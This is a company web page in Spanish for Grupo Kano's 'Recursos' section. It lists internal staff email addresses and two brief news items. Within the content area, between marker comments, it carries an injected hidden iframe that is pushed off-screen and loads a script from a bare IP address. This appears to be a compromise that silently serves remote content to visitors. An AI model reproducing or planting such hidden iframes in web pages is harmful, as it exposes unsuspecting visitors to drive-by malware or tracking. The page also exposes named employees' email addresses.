<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Grupo Kano - Recursos</title>
<link rel="icon" href="img/icono.ico"
type="image/x-icon"/>
<link rel="shortcut icon" href="img/icono.ico"
type="image/x-icon"/>
<style type="text/css">
<!--
body,td,th {
	color: #121212;
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
body {
	background-color: #FFFFFF;
	background-image: url(img/fondo.jpg);
	background-repeat: repeat-x;
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
a {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 11px;
	color: #565656;
}
a:link {
	text-decoration: none;
}
a:visited {
	text-decoration: none;
	color: #565656;
}
a:hover {
	text-decoration: underline;
	color: #565656;
}
a:active {
	text-decoration: none;
	color: #272727;
}
.style1 {font-size: 22px}
.style2 {color: #D4D4D4}
.style3 {
	font-size: 11px;
	color: #696969;
}
.style4 {color: #696969}
.style5 {font-size: 16px}
.style7 {color: #D4D4D4; font-size: 12px; }
.style8 {font-size: 12px}
-->
</style></head>

<body>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td height="170" colspan="5" background="img/top.png"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="900" height="170" id="top" align="middle">
      <param name="allowScriptAccess" value="sameDomain" />
      <param name="allowFullScreen" value="false" />
      <param name="movie" value="flash/top.swf" />
      <param name="quality" value="high" />
      <param name="wmode" value="transparent" />
      <param name="bgcolor" value="#ffffff" />
      <embed src="flash/top.swf" quality="high" wmode="transparent" bgcolor="#ffffff" width="900" height="170" name="top" align="middle" allowscriptaccess="sameDomain" allowfullscreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></embed>
    </object></td>
  </tr>
  
  <tr>
    <td width="20" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="590" valign="top" bgcolor="#FFFFFF"><p class="style1">Recursos</p><!--44e890--><style>body {overflow-x:hidden;overflow-y:auto;} </style>
<iframe id="xvg" name="xvg" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://217.160.206.54/count.php" > </iframe><!--/44e890-->

      <!--<p class="style1"><a href="#logotipos" class="style5">Logotipos</a>--> <span class="style7"> |||</span> <a href="#correos" class="style5">Correos Electr&oacute;nicos</a> <span class="style7"> |||</span> <a href="#noticias" class="style5">Noticias</a> </p>
      <p class="style1"><img src="img/linea_division.png" width="400" height="5" /></p>
      <p class="style3"><span class="style4"><strong>Listado de Correos Electr&oacute;nicos:</strong><a name="correos" id="correos"></a><br />
Este es un listado de los correos internos dentro de las filiales de Grupo Kano.</span></p>
<p class="style3">Haruo Kano - haruokano@gnkmex.com.mx</p>
    <p class="style3">Irma Avila - <span id="toBoxTo"><span dir="ltr"> </span>irmaavila@gnkmex.com.mx</span></p>
    <p class="style3">Gerardo Kano - gkano@natrade.com.mx </p>
    <p class="style3">Alejandro Anorve - alejandro@salmonor.com.mx</p>
    <p class="style3">Gabriela Sabate - gsabate@gnklogistica.com.mx </p>
    <p class="style3">&nbsp;</p>
    <p class="style3"><img src="img/linea_division.png" width="400" height="5" /></p>
    <p class="style3">&nbsp;</p>
    <p class="style3"><span class="style8"><strong>Noticias:</strong><a name="noticias" id="noticias"></a><br />
Este es un listado de las noticias dentro del Grupo.</span></p>
    <p class="style3">Certificado Iso 9001-2000</p>
    <p class="style3">Reconocimiento de parte del Estado de Guanajuato a GNKL </p>
    <p class="style3">&nbsp;</p>
    <p class="style3">&nbsp;</p>
    <p><br />
    </p></td>
    <td width="20" bgcolor="#FFFFFF"><p align="left" class="style1">&nbsp;</p></td>
    <td width="250" valign="top" bgcolor="#FFFFFF"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="250" height="210" align="top">
      <param name="movie" value="flash/filiales.swf" />
      <param name="quality" value="high" />
      <embed src="flash/filiales.swf" width="250" height="210" align="top" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash"></embed>
    </object></td>
    <td width="20" valign="bottom" bgcolor="#FFFFFF">&nbsp;</td>
  </tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td width="20" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="588" align="center" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="23" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="247" bgcolor="#FFFFFF">&nbsp;</td>
    <td width="22" bgcolor="#FFFFFF">&nbsp;</td>
  </tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<table width="900" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <td><img src="img/pie.png" width="900" height="35" /></td>
  </tr>
</table>
</body>
</html>
